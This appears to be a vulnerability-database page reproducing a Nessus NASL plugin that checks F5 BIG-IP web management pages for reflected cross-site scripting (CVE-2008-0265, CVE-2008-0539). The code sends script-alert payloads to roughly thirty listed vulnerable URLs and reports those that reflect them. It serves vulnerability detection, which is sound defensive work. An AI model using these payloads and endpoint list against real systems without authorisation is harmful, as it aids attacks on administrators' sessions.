Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2008-2021 nnposterBIGIP_WEB_XSS.NASL
HistoryFeb 11, 2008 - 12:00 a.m.

F5 BIG-IP Web Management Multiple XSS

2008-02-1100:00:00
This script is Copyright (C) 2008-2021 nnposter
www.tenable.com
33

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.009 Low

EPSS

Percentile

82.9%

JSON

The F5 BIG-IP web management interface on the remote host is susceptible to cross-site scripting attacks.

#%NASL_MIN_LEVEL 70300
# bigip_web_xss.nasl
#
# Notes:
#
# - Some pages are way bigger than 8K and BIG-IP does not use Content-Length.
#   The script uses custom http_send_recv_length() to retrieve the entire page.
#
# History:
#
# 1.00, 12/6/07
# - Initial release

# Changes by Tenable:
# - Revised plugin title (4/28/09)


include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
    {
    script_id(30217);
    script_version("1.15");

    script_name(english:"F5 BIG-IP Web Management Multiple XSS");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by multiple cross-site scripting
vulnerabilities." );
 script_set_attribute(attribute:"description", value:
"The F5 BIG-IP web management interface on the remote host is
susceptible to cross-site scripting attacks." );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/486217/100/0/threaded" );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/487118/100/0/threaded" );
 script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_cwe_id(79);

    script_summary(english:"Attempts XSS against F5 BIG-IP web management interface");
    script_family(english:"CGI abuses : XSS");
 script_set_attribute(attribute:"plugin_publication_date", value: "2008/02/11");
 script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

    script_category(ACT_ATTACK);
    script_cve_id("CVE-2008-0265","CVE-2008-0539");
    script_bugtraq_id(27272,27462);
    script_copyright(english:"This script is Copyright (C) 2008-2021 nnposter");
    script_dependencies("bigip_web_detect.nasl","http_login.nasl");
    script_require_keys("www/bigip");
    script_require_ports("Services/www",443);
    exit(0);
    }


include("url_func.inc");
include("http_func.inc");


function http_send_recv_length (port,data,length)
{
 local_var sock,resp;

 sock = http_open_socket(port);
 if (!sock) return NULL;
 send(socket:sock,data:data);
 resp = http_recv_length(socket:sock,bodylength:length);
 http_close_socket(sock);
 return resp;
}


function inject_xss (url,xss,port)
{
local_var req,resp,match;
 req = http_get(item:string(url,urlencode(str:xss)),port:port);
 resp = http_send_recv_length(port:port,data:req,length:64000);
 if ( resp )
 {
  if ( xss >< resp ) return TRUE;
 }
 return FALSE;
}


if (!get_kb_item("www/bigip")) exit(0);
port=get_http_port(default:443, embedded:TRUE);
if (!get_tcp_port_state(port) || !get_kb_item("www/"+port+"/bigip")) exit(0);

search_xss='" type="hidden">'
          +'<script>alert("'+SCRIPT_NAME+'")</script>'
          +'<input type="hidden" value="';

url=make_list();
xss=make_list();

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/locallb/virtual_server/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/locallb/profile/http/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/locallb/profile/ftp/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/locallb/profile/rtsp/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/locallb/profile/sip/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/locallb/profile/persistence/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/locallb/profile/fastl4/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/locallb/profile/fasthttp/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/locallb/profile/httpclass/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/locallb/profile/tcp/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/locallb/profile/udp/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/locallb/profile/sctp/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/locallb/profile/clientssl/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/locallb/profile/serverssl/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/locallb/profile/authn/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/locallb/profile/connpool/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/locallb/profile/statistics/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/locallb/profile/stream/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/locallb/pool/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/locallb/node/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/locallb/monitor/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/locallb/ssl_certificate/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/system/user/list.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/system/log/list_system.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/system/log/list_pktfilter.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/system/log/list_ltm.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/system/log/resources_audit.jsp?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/tmui/Control/jspmap/tmui/system/log/list_asm.jsp?SearchString=";
xss[i]=search_xss;

#This better fail; the page is not vulnerable
i=max_index(url);
url[i]="/tmui/Control/jspmap/xsl/auth_partition/list?SearchString=";
xss[i]=search_xss;

i=max_index(url);
url[i]="/dms/policy/rep_request.php?report_type=";
xss[i]='"><body onLoad=alert(&quot;'+SCRIPT_NAME+'&quot;)><foo ';

found="";

for (i=0; i<max_index(url); ++i)
    if (inject_xss(url:url[i],xss:xss[i], port:port))
        found+= '\n' + ereg_replace(string:url[i],pattern:"\?.*$",replace:"");

if (strlen(found) == 0 ) exit(0);

set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
security_warning(port:port,
                 extra:'The URLs listed below have been found vulnerable :\n'+
                       '\n'+
                       found +
                       '\n' +
                       'This list depends on privileges granted to the attacked user.\n');

Related

f5 4
nessus 2
nvd 2
cve 2
prion 2
cvelist 2
f5
f5
SOL8280 - Cross-site scripting vulnerabilities in BIG-IP Configuration utility CVE-2008-0265
2008-01-16 00:00:00
SOL8406 - The BIG-IP ASM web management interface cross-site scripting vulnerability CVE-2008-0539
2008-02-06 00:00:00
K8280 : Cross-site scripting vulnerabilities in BIG-IP Configuration utility CVE-2008-0265
2013-03-19 00:00:00
nessus
nessus
F5 Networks BIG-IP : XSS vulnerabilities in BIG-IP Configuration utility (SOL8280)
2014-10-10 00:00:00
F5 Networks BIG-IP : The BIG-IP ASM web management interface XSS vulnerability (SOL8406)
2014-10-10 00:00:00
nvd
nvd
CVE-2008-0265
2008-01-15 20:00:00
CVE-2008-0539
2008-02-01 20:00:00
cve
cve
CVE-2008-0265
2008-01-15 20:00:00
CVE-2008-0539
2008-02-01 20:00:00
prion
prion
Cross site scripting
2008-01-15 20:00:00
Cross site scripting
2008-02-01 20:00:00
cvelist
cvelist
CVE-2008-0265
2008-01-15 19:00:00
CVE-2008-0539
2008-02-01 19:41:00

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.009 Low

EPSS

Percentile

82.9%

JSON
Related for BIGIP_WEB_XSS.NASL
f54nessus2nvd2cve2prion2cvelist2